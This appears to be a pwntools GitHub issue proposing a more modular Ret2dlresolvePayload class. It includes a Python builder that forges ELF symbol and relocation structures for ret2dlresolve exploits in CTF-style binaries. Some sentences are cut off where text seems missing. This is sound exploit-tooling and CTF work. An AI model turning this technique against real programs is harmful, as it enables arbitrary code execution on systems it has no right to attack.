make Ret2dlresolvePayload more modular #2429
Currently using rop.ret2dlresolve along with Ret2dlresolvePayload doesn't successfully cover many cases where ret2dlresolve is exploitable. Namely this is because it looks for a gadget allowing it to control rdi and fails to account that:
That being said it would be nice if pwntools made creating a "manual" ret2dlresolve exploit easier by making Ret2dlresolvePayload more modular. Currently its main purpose is just to be passed to rop.ret2dlresolve as its doc says, but it can be useful on its own. For example this was a solution for amateursctf reflection that was submitted by a contestant:
The official solution doesn't even use Ret2dlresolvePayload, probably because the author found it easier to write the exploit from scratch than try to wrangle Ret2dlresolvePayload into working.
Currently the class is hard to work with for the following three reasons:

- `data_addr=None`) is completely undocumented.
- `ret` into the function being used for user input instead of having to do `pop rax; jmp rax;`-type shenanigans which is often impossible due to the given gadgets.
- `/bin/sh` as an argument but doesn't use it at all. Why is args even a mandatory argument to the class constructor?
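As an added example of what a "manual" ret2dlresolve payload needs (this is not pwntools' code and not the contestant's solution; it is written here to separate the structure layout from the ROP chain), the builder below lays out the symbol name, the fake `Elf64_Sym` and the fake `Elf64_Rela` at a caller-chosen `data_addr` in pure Python. It assumes a non-PIE x86-64 glibc target (so `l_addr` is 0 and `r_offset` is absolute); every address in the demo is constructed, and the `readable` mapping list is a hypothetical input the caller would fill from the target's memory map.

```python
import struct

# Sizes and constants from the ELF64 / x86-64 psABI.
ELF64_RELA_SIZE = 24        # sizeof(Elf64_Rela): r_offset, r_info, r_addend
ELF64_SYM_SIZE = 24         # sizeof(Elf64_Sym)
R_X86_64_JUMP_SLOT = 7
STB_GLOBAL, STT_FUNC = 1, 2


def align_to_table(addr, table, entry_size):
    """Smallest address >= addr that is a whole number of entries past `table`.

    _dl_fixup indexes DT_SYMTAB and DT_JMPREL by entry, so a fake entry is only
    reachable if its distance from the real table is a multiple of the entry size.
    """
    if addr < table:
        raise ValueError("fake entries must lie above the table they are indexed from")
    rem = (addr - table) % entry_size
    return addr if rem == 0 else addr + (entry_size - rem)


def build_ret2dlresolve(data_addr, jmprel, symtab, strtab, symbol=b"system",
                        versym=None, readable=()):
    """Lay out symbol name, fake Elf64_Sym and fake Elf64_Rela starting at data_addr.

    Returns (blob, reloc_arg, info): `blob` is written to data_addr by whatever
    primitive the chain has; `reloc_arg` is the value a PLT stub normally pushes
    before jumping to PLT0 (_dl_runtime_resolve). Non-PIE x86-64 assumed.
    """
    if data_addr < strtab:
        raise ValueError("st_name is an unsigned offset from DT_STRTAB; data must lie above it")

    # 1. The name _dl_lookup_symbol_x will search for, NUL terminated.
    name_addr = data_addr
    blob = symbol + b"\x00"

    # 2. Fake Elf64_Sym: undefined global function whose st_name points at (1).
    sym_addr = align_to_table(data_addr + len(blob), symtab, ELF64_SYM_SIZE)
    blob += b"\x00" * (sym_addr - (data_addr + len(blob)))
    sym_idx = (sym_addr - symtab) // ELF64_SYM_SIZE
    st_name = name_addr - strtab
    if st_name > 0xFFFFFFFF:
        raise ValueError("st_name does not fit in 32 bits")
    blob += struct.pack("<IBBHQQ", st_name, (STB_GLOBAL << 4) | STT_FUNC, 0, 0, 0, 0)

    # 3. Fake Elf64_Rela: r_info selects (2); r_offset is the slot the resolver
    #    writes the resolved address to (a spare qword right after the Rela).
    rel_addr = align_to_table(data_addr + len(blob), jmprel, ELF64_RELA_SIZE)
    blob += b"\x00" * (rel_addr - (data_addr + len(blob)))
    reloc_arg = (rel_addr - jmprel) // ELF64_RELA_SIZE
    slot_addr = rel_addr + ELF64_RELA_SIZE
    blob += struct.pack("<QQq", slot_addr, (sym_idx << 32) | R_X86_64_JUMP_SLOT, 0)
    blob += b"\x00" * 8

    info = {"name_addr": name_addr, "sym_addr": sym_addr, "sym_idx": sym_idx,
            "rel_addr": rel_addr, "slot_addr": slot_addr}

    # 4. DT_VERSYM hazard: before the lookup, _dl_fixup reads the 16-bit entry at
    #    versym + 2*sym_idx. With a huge sym_idx that read can leave mapped memory,
    #    which is one of the ways a naive ret2dlresolve crashes. A readable address
    #    is necessary, not sufficient: the value found there still has to yield a
    #    usable l_versions entry, which only the live target can confirm.
    if versym is not None:
        read_addr = versym + 2 * sym_idx
        info["versym_read_addr"] = read_addr
        if readable and not any(lo <= read_addr and read_addr + 2 <= hi for lo, hi in readable):
            raise ValueError("versym[%d] at %#x is not in a readable mapping" % (sym_idx, read_addr))
    return blob, reloc_arg, info


if __name__ == "__main__":
    # Constructed, hypothetical addresses for a non-PIE binary (not from any real target).
    args = dict(data_addr=0x601100, jmprel=0x400450, symtab=0x4002C0, strtab=0x400350)
    blob, reloc_arg, info = build_ret2dlresolve(**args)
    print("write %d bytes to %#x, then return to PLT0 with reloc_arg=%d" % (len(blob), args["data_addr"], reloc_arg))
    print({k: hex(v) for k, v in info.items()})
    try:
        build_ret2dlresolve(versym=0x400400, readable=[(0x400000, 0x401000)], **args)
    except ValueError as e:
        print("rejected:", e)
```

The chain itself stays with the caller: deliver `blob` to `data_addr` (for instance by returning into the program's own input routine), set rdi to the argument the resolved function should receive, then return into PLT0 with `reloc_arg` as the next qword on the stack. Keeping those steps outside the builder is the separation the issue asks for: the structures depend only on the ELF's dynamic tables, while the gadget situation varies per binary.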